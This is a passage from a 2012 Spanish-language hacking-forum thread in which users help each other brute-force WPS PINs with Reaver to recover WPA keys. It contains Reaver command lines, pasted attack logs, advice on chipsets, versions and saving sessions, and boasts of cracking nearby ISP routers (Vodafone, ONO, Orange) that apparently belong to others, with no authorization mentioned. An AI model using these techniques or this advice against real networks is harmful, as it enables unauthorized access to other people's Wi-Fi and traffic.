TODAS las antenas que he usado desde 2007 han sido vía usb,desde las conceptronic hasta las proporcionadas por timofónica......que sólo podía ponerlas en modo monitor y a esperar....utilizaba Backtrack 3 junto con el wlandecrypter(el 0.6..ha llovido mucho,va por el 1.3...e incluso tengo una modificación hecha por un amigo donde le añadió más essids) y wepattack....porque no podía inyectar tráfico....hasta que en su momento dí con la alfa .No las he contado,pero he probado al menos 20 antenas diferentes(las mías y las de los colegas)..... ahora mismo hago pruebas con 4,...alfa awuso36h,tp-link n722n,ipw2200,otra que se llama connection N&C y otra mas que me han regalado(la blueway negra,tiene chipset 3070,malo para reaver).

Digo que funcionan mejor que las integradas entre otras cosas porque la antena propiamente dicha del portátil va por detrás de la pantalla,,dentro de la propia pantalla(al menos en los portátiles que he abierto para reparar)...al principio pensé que era la ram,pero no....lo cual impide alargar o mover la antena individualmente....y lógicamente no puedes añadirle un cable o una antena amplificadora ni nada por el estilo,al menos en teoría.


Respondiendo a tu pregunta....aquí te dejo una captura del "arsenal" que tengo por casa...falta alguna mas y las tres ipw2200 que también tengo(integradas pero reemplazables xd).....junto con las antenas amplificadoras y el cable de 3 mts...etc,etc  :silbar:
(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/Antenas.jpg)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 1 Noviembre 2012, 19:32 pm
Menudo arsenal wireless, volviendo al reaver, me gustaría preguntar, si el wpscrackgui, añade alguna funcionalidad o simplemente es un entorno gráfico dentro del cual se ejecuta el reaver, si es así no veo la diferencia entre ejecutar reaver desde consola, a comando puro y duro y ejecutarlo desde el entorno gráfico, los resultados deben ser los mismos, deduzco. :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 1 Noviembre 2012, 21:30 pm
Cuantas probaste para decir eso? 1..  :xD



TODAS las antenas que he usado desde 2007 han sido vía usb,desde las conceptronic hasta las proporcionadas por timofónica......que sólo podía ponerlas en modo monitor y a esperar....utilizaba Backtrack 3 junto con el wlandecrypter(el 0.6..ha llovido mucho,va por el 1.3...e incluso tengo una modificación hecha por un amigo donde le añadió más essids) y wepattack....porque no podía inyectar tráfico....hasta que en su momento dí con la alfa .No las he contado,pero he probado al menos 20 antenas diferentes(las mías y las de los colegas)..... ahora mismo hago pruebas con 4,...alfa awuso36h,tp-link n722n,ipw2200,otra que se llama connection N&C y otra mas que me han regalado(la blueway negra,tiene chipset 3070,malo para reaver).

Digo que funcionan mejor que las integradas entre otras cosas porque la antena propiamente dicha del portátil va por detrás de la pantalla,,dentro de la propia pantalla(al menos en los portátiles que he abierto para reparar)...al principio pensé que era la ram,pero no....lo cual impide alargar o mover la antena individualmente....y lógicamente no puedes añadirle un cable o una antena amplificadora ni nada por el estilo,al menos en teoría.


Respondiendo a tu pregunta....aquí te dejo una captura del "arsenal" que tengo por casa...falta alguna mas y las tres ipw2200 que también tengo(integradas pero reemplazables xd).....junto con las antenas amplificadoras y el cable de 3 mts...etc,etc  :silbar:

Si que ha probado si...jajajajajaj


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: liena en 1 Noviembre 2012, 23:58 pm


Quiero aportar unos datos.


Mi AR9285 se pone en modo monitor desde wifiway 2.0, o 3.4, y puede inyectar bajo la suit aircrack-ng, que incorporan dichas distribuciones.

Por curiosidad, ¿Tienes idea de porqué el Reaver no es compatible con los drivers? es decir, ¿que hace Reaver con las tarjetas que no haga Aircrack?

Para evitar confusiones y tras las pruebas realizadas quiero decir que la tarjeta AR9285, de tipo interno que trae de serie una notebook Asus EeePc, SI QUE ES COMPATIBLE con el Reaver que uso desde wifiway 3.4 en formato liveUSB

Ha funcionado durante 8 horas con un AP del tipo WLAN_xxxx, con WPA PSK y el WPS en 0x02, Consiguiendo la clave, que probé después.
Por otro lado con un vodafone voy probando a ratos y avanza, despacio, pero avanza. Tardará unas 68 hs las cuales conseguiré en 2-3 semanas. Si funciona lo diré.

Saludos,
Liena


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 2 Noviembre 2012, 00:08 am
Si que ha probado si...jajajajajaj

internas?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 2 Noviembre 2012, 02:59 am
Si por internas te refieres a las que llevan los portátiles....bueno,lógicamente tras comprobar la contundencia que me daban las externas,opté por seguir con estas últimas.Curiosamente conseguí 3 compatibles con mi  portatil,dos con el mismo chipset...ipw2200 y la otra ipw3945...y son excelentes para auditorías y tal,pero no pueden competir frente a otras de más potencia y que curiosamente son para hacerlas rular por usb....además no podía usar dos a la vez... ;)
Por experiencia personal,la ALFA AWUSO36H que tengo es lo mejor que ha caído en mis manos ,funciona con cualquier distro,pero SÓLO para auditar.....para navegar y tal,se muestra inestable.
Las tp-link valen para las dos cosas sin fisuras....la D-link se me tostó inyectando tráfico.....las conceptronic ya ni regaladas las quiero....desde que el entorno WEP es casi anecdótico,ya no me sirven,salvo para experimentar.
Con la alfa o la blueway y una antena externa de 8 db...pues eso,parece que tengo los routers al lado del portátil   :silbar:
Desde que instalé reaver,no tengo que andar con lives ni con máquinas virtuales...lo cual me deja tiempo para "reintentar" viejos ataques  hasta que se bloquean los routers...usando 2 antenas,la del portátil para navegar y otra vía USB para lanzar pines mientras estoy posteando sin perder ojo a la shell... >:D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Polak en 3 Noviembre 2012, 04:55 am
Hola, tengo algunas dudas que me gustaria saber.

Tengo entendido que el Reaver saca la pass wpa por si solo despues de sacar el pin, pues bien, a mi no me lo hace. Despues de sacar el pin se queda estancado y no hace nada. ¿Hay que hacer algo despues de que te saque el pin? (utilizo wifiway 3.4)

Por otra parte, ¿Es normal que saque el pin en el 90% del proceso? cuando me pasa eso lo vuelvo a iniciar a partir de ese porciento y sigue trabajando pero sin sacar al clave aun. Intentando resolverlo lo iniciaba con los primeros 4 digitos del pin que me saco antes solo que esta vez el pin completo era distinto y la verdad, no me fio.


Es la pirmera vez que utilizo Reaver y no me queda claro, ya que pensaba que la clave la sacaba el solo. ¿Hay alguna manera de utilizar el pin WPS de otra forma para poder sacar la clave?

En resumen, que no me saca la clave.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 4 Noviembre 2012, 01:01 am
@Polak: Principalmente wifiway 3.4 es re-viejo ya y usa la versión 1.4, debes cambiarla por la 1.3 para que no se te quede parada en 99%, que este en 99% no indica para nada que el pin este completo o parcialmente completo. Por otra parte puede sacarte el pin al 0.01%, pues el % que muestra es el del diccionario de los pins que ha probado, debes cambiar la versión de reaver.

¿Hay alguna manera de utilizar el pin WPS de otra forma para poder sacar la clave?

puedes conectarte con el router directamente con el PIN pero esto si no tienes el real nunca podrás, el PIN es simplemente una llave, si la tienes abres la puerta de la caja fuerte donde esta escrita la clave en un papel, si no la tienes mala suerte.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Polak en 4 Noviembre 2012, 18:01 pm
@Polak: Principalmente wifiway 3.4 es re-viejo ya y usa la versión 1.4, debes cambiarla por la 1.3 para que no se te quede parada en 99%, que este en 99% no indica para nada que el pin este completo o parcialmente completo. Por otra parte puede sacarte el pin al 0.01%, pues el % que muestra es el del diccionario de los pins que ha probado, debes cambiar la versión de reaver.

puedes conectarte con el router directamente con el PIN pero esto si no tienes el real nunca podrás, el PIN es simplemente una llave, si la tienes abres la puerta de la caja fuerte donde esta escrita la clave en un papel, si no la tienes mala suerte.

¿Vale, entonces cual seria la version mas "estable" y nueva del reaver? Tambien me gustaria saber si funcionaria en un CD_live ejecutandolo en ese cd_live, yo uso VMware Workstation. Pero me imagino que se podria instalar en Linux o Ubuntu, te agradeceria mucho que me dijeras las versiones mas adaptadas para ello, a poder ser de Ubunto, pero me da igual realmente.

"Gracias de antebrazo" xD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 4 Noviembre 2012, 21:06 pm
  • Trying pin 91065674
  • Sending EAPOL START request
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
  • Sending WSC NACK
  • [!] WPS transaction failed, re-trying last pin
  • 2.60% complete @ 2012-11-04 20:02:19 (82 seconds/attempt)
  • Trying pin 91065674
  • [!] WARNING: Failed to associate with 2C:B0:xx:FF:xx:xx (ESSID: ONOxxxx)
    [!] WARNING: Failed to associate with 2C:B0:xx:FF:xx:xx (ESSID: ONOxxxx)
    [!] WARNING: Failed to associate with 2C:B0:xx:FF:xx:xx (ESSID: ONOxxxx)
    [!] WARNING: Failed to associate with 2C:B0:xx:FF:xx:xx (ESSID: ONOxxxx)
    [!] WARNING: Failed to associate with 2C:B0:xx:FF:xx:xx (ESSID: ONOxxxx)
    [!] WARNING: Failed to associate with 2C:B0:xx:FF:xx:xx (ESSID: ONOxxxx)
    HOLA con el permiso de todos tengo una gran duda, todos estos warnings son normales o esta red no es hackeable ? Gracias....
    Saludos a todos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 4 Noviembre 2012, 22:16 pm
¿Vale, entonces cual seria la version mas "estable" y nueva del reaver?

Ninguna es estable, todo depende de la red a atacar.

Tambien me gustaria saber si funcionaria en un CD_live ejecutandolo en ese cd_live, yo uso VMware Workstation.

Si pero los drives a veces son muy raros.

Pero me imagino que se podria instalar en Linux o Ubuntu, te agradeceria mucho que me dijeras las versiones mas adaptadas para ello, a poder ser de Ubunto, pero me da igual realmente.

Claro, bajo cualquier linux puedes usarlo, yo no utilizo wifiway desde la versión 2.0.3, porque me caso de grabar y grabar cds. Entonces me compre un Rígido de 300GB con un adaptador USB y donde valla lo tengo armado ya con Ubuntu 11.10 y todo lo que necesito.

@pepehabana: principalmente el chipset que estas usando funciona mal, tiene mal el driver, y/o tienes poca señal antena la red, aparte que el diccionario esta mal, nunca en el 2.60% prueba el pin 9106XXXX o acaso que hallas utilizado algún diccionario de WPSCrackGUI.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 4 Noviembre 2012, 22:22 pm
Hola Uso el WIFIWAY3.4 Tengo la Ralink RT61 (chipset 2561) turbo wireless pci y solo he seleccionado la red al estilo que lei......

 reaver - i mon0 -b bssid -c canal -e nombre de red -d 15 -vv

no he usado nada de diccionarios.... :-(


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 4 Noviembre 2012, 22:41 pm
Wenas a todos, una pregunta, este error es porque no es hackeable el router o porque tengo que cambiar la version del reaver? uso wifiway 3.4 y este es el error:

WARNING: LAST MESSAGE NOT PROCESSED PROPERLY, REVERTING STATE TO PREVIOUS MESSAGE
Sending WSC NACK
WPS Transaction failed, re-trying last pin


Y se va repitiendo todo el rato, pero no pasa del 0.00%, gracias de antemano por la ayuda.

He leido un poco y algunos me han dicho que es normal que esta probando frecuencias que lo deje un buen rato, otros que pruebe con wifislax, otros que añada la opcion --no-nacks , pero alomejor es solo actualizar el reaver, que opinais?


De todas formas otra red WLAN_XXXX si que lo he conseguido sacar con el reaver en unos 2 dias y sin esos errores osea que no es por la tarjeta wifi


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 4 Noviembre 2012, 22:48 pm
ups le di un nuevo mensaje sorry


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 4 Noviembre 2012, 23:07 pm
Uso un live cd con Wifiway 3.4
Reaver v1.4 WiFi Protected Setup Attack Tool
tendria que actualizar ??
como se actualiza el reaver en un live CD jajaja ???
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: cesarcede en 4 Noviembre 2012, 23:26 pm
Hola a todos amigos, estoy utilizando el reaver wifislax 4.2 he utilizado tambien el el que trae incorporado wifiway 3.4, tengo una tarjeta de de red inalambrica TPLink 150 mbs, el problema es el siguiente estoy trasteando la red de de mi hermano introduzco el comando incluyendo  -p al poco rato me salta wps: ?????? son 64 digitos entre letras y numeros osea hexadecimales, me salgo del live cd entro win. introduzco toda la cantidad de números y letras que e da el reaver y nada de nada no he conseguido conectar! quiero mencionar que lo he hecho varias veces y las veces que lo hago me da clave hexadecimal diferente. no se a que se debe el problema realmente seria de mucha utilidad cualquier ayuda de parte de ustedes  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 5 Noviembre 2012, 01:08 am
@pepehabana: La Ralink 2561 PCI   (rt61pci) No es compatible con Reaver; puede llegar a funcionar si usas un driver rt2800usb pero hay veces que funciona y otra no.

@Carpena: y que te dice el Wash? esta bloqueado o no? que chipset usas?

@pepehabana: Leete el hilo, ahí se nombra todo como actualizar y cambiar de versiones.

@cesarcede: TPLink 150 mbs no me dice nada, necesitamos modelo completo con chipset. en WPA: te dice la clave, en PIN solo aparece el PIN. Si te va diferente cada ves cambia de versión de reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 5 Noviembre 2012, 11:11 am
P4 gracias por tus consejos y ayuda....
hoy en la mañana vi el reaver darme contraseña y pin, perfectamente con la RALINK RT61 2561 turbo wireless, asi que sumenla al listado de tarjetas mas o menos recomendadas jajaja, a lo mejor no con todas las redes pero con WLAN_XXXX, en 35500 segundos....
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 5 Noviembre 2012, 22:14 pm
Pues uso una tarjeta alfa de 1w con el chipset rtl8187L ,confirmado..
Todavia no he usado el wash pero he seguido los pasos para saber si esta activado en base al video de manejo de reaver que sale en la pagina de wifiway, que basicamente se trata de hacer una captura y analizarla con el wireshark y tiene que poner en una parte 0x02 y si que me sale 0x02 igual que en la otra que si consegi obtener, si quereis mas detalles mañana arranco otra vez y ejecuto el walsh y os paso el video

otra cosa eso que se comenta sobre:
Citar
Buena noticia airdecloak-ng + Tkiptun-ng = WPA en 15 minutos
es cierto???
http://ubuntuadicto.blogspot.com.es/2009/04/buena-noticia-airdecloak-ng-tkiptun-ng.html (http://ubuntuadicto.blogspot.com.es/2009/04/buena-noticia-airdecloak-ng-tkiptun-ng.html)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 6 Noviembre 2012, 00:26 am
Pues uso una tarjeta alfa de 1w con el chipset rtl8187L ,confirmado..
Todavia no he usado el wash pero he seguido los pasos para saber si esta activado en base al video de manejo de reaver que sale en la pagina de wifiway, que basicamente se trata de hacer una captura y analizarla con el wireshark y tiene que poner en una parte 0x02 y si que me sale 0x02 igual que en la otra que si consegi obtener, si quereis mas detalles mañana arranco otra vez y ejecuto el walsh y os paso el video

otra cosa eso que se comenta sobre:es cierto???
http://ubuntuadicto.blogspot.com.es/2009/04/buena-noticia-airdecloak-ng-tkiptun-ng.html (http://ubuntuadicto.blogspot.com.es/2009/04/buena-noticia-airdecloak-ng-tkiptun-ng.html)

saca una WPA de 64 caracteres en 15 minutos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 6 Noviembre 2012, 19:16 pm
saca una WPA de 64 caracteres en 15 minutos.
Y como se hace? tienes algun video? si no mandamelo por privado que alomejor nos estamos desviando un poco del tema del reaver


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: enriker1 en 6 Noviembre 2012, 21:47 pm
Hola gente,, encantado de entrar en este foro..

tengo una consutilla con este tema ,levo desde el miercoles pasado con una red wpa2 dandole con el reaver sin descanso ,pues bien hpy hace una semana queesta enchufado y va por el 0,35 por cie NOOOOO llega ni al 1 por cien buffff por eso quiero saver si es normal o que ,el ruter se llama Buffalo-xxxxxx esto sta en reno unido.
ejemplo:
0,35% XXXXXXXXXXXXXXXX (35968 SECONDS/PIN)
0,35% XXXXXXXXXXXXXXXX (35969 SECONDS/PIN)

cuando pasaba del 0,30 al 0,35 bajavan los segundose 72349 por ejemplo a 24583

y asi lleva 1 semana lo nico diferente que e visto es en una de estas que apuesto R4 delate del porcentaje (claro esta que todo no lo e visto) jejje

lo estoy haciendo con balcktrank 5 r3 y reaer 1.4

espero que alguien me pueda ayudar grcias de antemano


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 7 Noviembre 2012, 10:26 am
Hola a todos la Alfa network adaptador wifi usb realtek rtl8187L es compatible???
Si una red nos da el wps 0x02 es 100% hackeable ???

Saludos...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: enriker1 en 7 Noviembre 2012, 14:30 pm
Hola gente,, encantado de entrar en este foro..

tengo una consutilla con este tema ,llevo desde el miercoles pasado con una red wpa2 dandole con el reaver sin descanso ,pues bien hoy hace una semana que esta enchufado y va por el 0,35 por cie NOOOOO llega ni al 1 por cien buffff por eso quiero saber si es normal o que ,el ruter se llama Buffalo-xxxxxx esto esta en reino unido.
ejemplo:
0,35% XXXXXXXXXXXXXXXX (35968 SECONDS/PIN)
0,35% XXXXXXXXXXXXXXXX (35969 SECONDS/PIN)

cuando pasaba del 0,30 al 0,35 bajavan los segundos de 72349 por ejemplo a 24583

y asi lleva 1 semana lo unico diferente que e visto es en una de estas que apuesto R4 delate del porcentaje (claro esta que todo no lo e visto) jejje

lo estoy haciendo con balcktrank 5 r3 y reaer 1.4

espero que alguien me pueda ayudar gracias de antemano



Hoy me e levantado y nada sigue el 0.35 por cien ... help help help ,necesito que algun esperto en esta materia me diga si es normal o que ,y que es ese R4 que aparecio antes del porcentaje en una ocasion.(es buena señal?)

thank you de atemano.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 7 Noviembre 2012, 15:29 pm
No soy un experto pero la ultima vez que una red me dejo tirado, sin avanzar, fue porque alguien apago el router, sabes abrí una nueva ventana puse airodump-mg mon0 and guess what.....??? No estaba online. Desde entonces reviso siempre cada una hora si hay avances todo va O.K.....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 7 Noviembre 2012, 19:26 pm
vaya ahora intento con otra red y me llega al 99.99% y se queda asi, joer....
he comprobado y el ap estaba encendido, mare mia y eso que en el video decian que si tiene 0x02 la clave saldria siempre...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 7 Noviembre 2012, 19:51 pm
Carpena hay que cambiar la version esa de REAVER que viene en el WIFIWAY 3.4 es simple solo lee la pagina 7 de este HILO


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: enriker1 en 7 Noviembre 2012, 20:51 pm
No soy un experto pero la ultima vez que una red me dejo tirado, sin avanzar, fue porque alguien apago el router, sabes abrí una nueva ventana puse airodump-mg mon0 and guess what.....??? No estaba online. Desde entonces reviso siempre cada una hora si hay avances todo va O.K.....

Pues no es el caso jejej ,soy novato pero hasta hay llego jejejej .gracias de todos modos por la intencion.

Aver si alguien mas me puede asesorar ...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 7 Noviembre 2012, 21:08 pm
gracias pepehabana, en cuanto pueda lo pruebo y te comento


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: liena en 7 Noviembre 2012, 21:33 pm
Hola P4nd3m0n1um,

Se que lo que cito es algo viejo, .. de marzo,



3.- Puedes actualizar el reaver bajando el modulo y colocandolo en la carpeta modules

El módulo que te bajas ¿es el del Reaver 1.4 o del 1.3?

Yo tengo el Reaver 1.4 que viene de serie con el wifiway 3.4, y lo uso en formato liveUSB.
El wifiway lo bajé hace 2 meses y no se si:

1.- trae el Reaver 1.4 del que hablabas en tu post de marzo y que estaba desactualizado,
2.- y ahora se puede conseguir un módulo del 1.4 actualizado.
3.- Al bajar mi Wifiway en septiembre éste ya incorpora el 1.4 actualizado.
4.- Te referías a bajar el módulo del Reaver 1.3 y meterlo en el pen.

Tal vez sea absurdo por mi parte, pero me extraña que a estas altura no exista el módulo actualizado del R 1.4 para simplemente incorporar al Pen.

Gracias de antemano por tu seguro certera ayuda.

Carpena hay que cambiar la version esa de REAVER que viene en el WIFIWAY 3.4 es simple solo lee la pagina 7 de este HILO

Lo siento mucho pero como ves para mi no es tan simple.

Saludos,
Liena


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: chungalex en 8 Noviembre 2012, 16:31 pm
hola. queria comentar algo sobre las 8C:0C:A3 y el tema del 99,99%.
Resulta que por la red he encontrado un usuario que prueba en reaver con -p el pin que su router 8c:0c:a3 trae por defecto y dice que reaver tiene un bug porque no prueba dicho pin, sino que cambia el ultimo digito de este, el cheksum y no le saca la llave. Mi pregunta, es posible que estos nuevos router traigan por defecto un pin cuyo ultimo digito no sea el el que reaver implementa por cheksum y por ello este no encuentra tal pin llegando al 99,99%. Hay algun usuario con uno de estos router que haya comprobado si el pin que trae por defecto su router es un pin valido, respecto al ultimo digito, para reaver. saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 8 Noviembre 2012, 20:07 pm
sorry, parezco tonto repitiendo los mensajes ajajaj


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 8 Noviembre 2012, 20:38 pm

Yo no se que pasa con el 99.99% pero en unos dias usare el live cd de Reaver Pro
que es una distro nueva que han echo especialista en el tema k te dice automaticamente y en entorno grafico hasta que redes pueden ser hackeadas, ya os aviso cuando lo pruebe

http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html (http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html)


por cierto se comenta que para usar esta distro tienes que usar un chipset rtl8187L osea que o sabeis montar otros chipsets o lo veo chungo, de todas formas a mi me sirve porque es el que tengo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Rumberto en 8 Noviembre 2012, 21:28 pm
Hola a todos, llevo un día intentando sacar una pass y me gustaría que me dijeseis un par de cosas :

- Hace unos minutos se ha cumplido 24 horas desde que he empezado a utilizar reaver con una red de ONOXXXX cuya MAC empieza por 00:21:B7.... , va por el 16% a una media de 52 pin/sec y he leido por aquí que a la gente le tarda bastante menos, no tiene que llegar al 100% a este ritmo verdad? Me refiero a que si encuentra el pin en el 20% por ejemplo ya termina, no?

- En caso de pausar el proceso, hay que guardarlo obligatoriamente ? O si me fijo en el ultimo pin que ha probado y empiezo otro ataque desde ese mismo continua ahí?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: notepad77 en 8 Noviembre 2012, 21:40 pm
Yo no se que pasa con el 99.99% pero en unos dias usare el live cd de Reaver Pro
que es una distro nueva que han echo especialista en el tema k te dice automaticamente y en entorno grafico hasta que redes pueden ser hackeadas, ya os aviso cuando lo pruebe

http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html (http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html)

Sinceramente yo lo e provado tambien y el mismo resultado 99.99% te lo comento mas que nada para que no pierdas el tiempo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Noviembre 2012, 01:06 am
1.- Hola a todos la Alfa network adaptador wifi usb realtek rtl8187L es compatible???
2.- Si una red nos da el wps 0x02 es 100% hackeable ???

Saludos...

1.- Si.
2.- No.

Hola a todos, llevo un día intentando sacar una pass y me gustaría que me dijeseis un par de cosas :

- Hace unos minutos se ha cumplido 24 horas desde que he empezado a utilizar reaver con una red de ONOXXXX cuya MAC empieza por 00:21:B7.... , va por el 16% a una media de 52 pin/sec y he leido por aquí que a la gente le tarda bastante menos, no tiene que llegar al 100% a este ritmo verdad? Me refiero a que si encuentra el pin en el 20% por ejemplo ya termina, no?

- En caso de pausar el proceso, hay que guardarlo obligatoriamente ? O si me fijo en el ultimo pin que ha probado y empiezo otro ataque desde ese mismo continua ahí?

Yo tarde 30 Días con un Thomson, vas bien!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dubvision en 9 Noviembre 2012, 13:12 pm
Hola a todos, llevo un día intentando sacar una pass y me gustaría que me dijeseis un par de cosas :

- Hace unos minutos se ha cumplido 24 horas desde que he empezado a utilizar reaver con una red de ONOXXXX cuya MAC empieza por 00:21:B7.... , va por el 16% a una media de 52 pin/sec y he leido por aquí que a la gente le tarda bastante menos, no tiene que llegar al 100% a este ritmo verdad? Me refiero a que si encuentra el pin en el 20% por ejemplo ya termina, no?

- En caso de pausar el proceso, hay que guardarlo obligatoriamente ? O si me fijo en el ultimo pin que ha probado y empiezo otro ataque desde ese mismo continua ahí?

Es mejor guardar por otra parte, de cuanto es el RSSI de esa señal? cuando es menor de 70 o sea... de 69 para abajo hay mas posibilidades de que vaya mas rápido y si lo tienes de 60 o mas bajo, te irá cagando leches así que mira siempre el RSSI, mas es peor menos es mejor :P


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: smartguypti en 9 Noviembre 2012, 20:57 pm
I am using rever and reaver pro and can't connect any TG582n and we have 6. I always get a time-out 60 sec

reaver -i mon0 -b 9999999999 -c 9 -e yyyyyyyyy -vv
and
reaver -i mon0 -b 9999999999 -c 9 -e yyyyyyyyy -vv --dh-small and nothing

Please help I need the TG582n

TY


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 10 Noviembre 2012, 09:15 am
Hola a todos, llevo un día intentando sacar una pass y me gustaría que me dijeseis un par de cosas :



- En caso de pausar el proceso, hay que guardarlo obligatoriamente ? O si me fijo en el ultimo pin que ha probado y empiezo otro ataque desde ese mismo continua ahí?

Deberías,si no quieres perder todo el avance.....de no guardar el progreso empiezas una y otra vez desde 0.....con la misma lentitud.
La demora de respuesta del pin creo que es por la distancia a la que se encuentre el router....más lejos,mas tarda en llegar el pin.... eso he deducido en mis pruebas,aunque quizás estoy equivocado.
Reaver  te da la opción de guardar la sesión..... y/n,por lo tanto si reinicias con los progresos guardados,REAVER seguirá desde el último pin que lanzó,a menos que tengas un pin concreto y lo lances directamente....
Lo que no sé es si lanzando un pin concreto,si no es el correcto,en qué punto retomará reaver la nueva petición de pin,si continúa o se queda parado esperando otro comando...no lo he probado(todavía),pero lo haré....aunque si alguien lo ha probado antes,podría comentarlo y así me ahorro "castigar" más de la cuenta los AP's del entorno. :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 10 Noviembre 2012, 16:43 pm
Alguien que sepa como guardar sesión de reaver... Uso wifiway 3.4 Live CD, o virtual el tema es k no se como hacerlo...
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 11 Noviembre 2012, 09:21 am

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/reaver.png)

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/wifiway2.png)

El archivo creado se llama reaver attack.xzm...el cual lo puedes guardar en un pendrive o copiar en el SO anfitrión si estás con un live cd...
Si estás en modo virtual...no deberías perder el fichero creado una vez reinicies la máquina virtual....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Rumberto en 11 Noviembre 2012, 12:50 pm
Gracias a todos, la sesión la he podido guardar correctamente y al iniciarla sigue por el mismo sitio, asi que de momento a seguir esperando (4 días y 45%).

La única red que tengo visible en otro piso que tengo es de una Orange-YXXX (Letra y numeros) pero a la hora de iniciar el ataque se conecta bien, pero al cabo de 1 minuto desconecta. Será que el router tiene algo para desconectar ataques de reaver ? Hay alguna posibilidad de sacar otra wpa2 de Orange actualmente ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 11 Noviembre 2012, 13:51 pm
@Rumberto Para el viernes seguro terminas!  ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 12 Noviembre 2012, 10:17 am
Otro vodafone_XXXX que ha caído esta noche....en este caso la el bssid es 6A:55:7C:XX:XX:XX...para variar lanzando reaver 1.4 directamente desde xubuntu 10.10

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/vodafone.png)

He podido comprobar que el pin se demoraba bastante al principio....más de 100 segundos....pero poco a poco se fue estabilizando hasta quedarse en 6 sg....pensé que me pillaba demasiado lejos el AP...aunque con una antena de 1800mW y 10 dB casi que me daba lo mismo...por probarla...una "nisu" bastante contundente por lo que he comprobado de la marca EDUP con chip RTL8187L...
11877 segundos=algo mas de 3 horas...
En este router la wpa es  de 14 letras todas mayúsculas....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 13 Noviembre 2012, 22:11 pm

El archivo creado se llama reaver attack.xzm...el cual lo puedes guardar en un pendrive o copiar en el SO anfitrión si estás con un live cd...


y en que ruta se guarda????
y cual es el comando para restaurarlo despues?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
